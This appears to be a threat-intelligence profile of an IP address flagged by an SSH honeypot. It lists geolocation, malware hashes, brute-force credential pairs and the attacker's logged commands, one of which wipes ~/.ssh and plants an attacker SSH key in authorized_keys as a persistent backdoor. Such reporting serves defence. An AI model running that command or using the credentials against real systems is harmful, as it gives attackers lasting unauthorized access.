โš TROYANOSYVIRUS
Active Threat โ€ข HIGH

120.48.130.213

First Detection1/7/2026
Last Activity2/22/2026
ISPBeijing Baidu Netcom Science and Technology Co., Ltd.
๐ŸŽฏ
287
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
21
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Beijing
ASN
AS38365
ISP
Beijing Baidu Netcom Science and Technology Co., Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

045aa0db0c6fe4894cce...โ†’09a3e612f8cad1560057...โ†’28720365c5e7476a011e...โ†’28ba533b0f3c4df63d6b...โ†’3f1f9a5db692d999bb3d...โ†’

Attempted Credentials

๐Ÿ”aditya/aditya2025
1x
๐Ÿ”root/3245gs5662d34
1x
๐Ÿ”root/orange
1x
๐Ÿ”root/online@2026
1x
๐Ÿ”n8n/n8n
1x
๐Ÿ”cheeki/M3gaP33!
1x
๐Ÿ”vpnuser/vpnuserpass
1x
๐Ÿ”root/09N1RCa1Hs31
1x

Executed Commands

$which ls3x
$uname3x
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'3x
$lockr -ia .ssh3x
$top3x
$whoami3x
$uname -a3x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~3x
$lscpu | grep Model3x
$cat /proc/cpuinfo | grep model | grep name | wc -l3x

Risk Assessment

65
/100
LowMediumHighCritical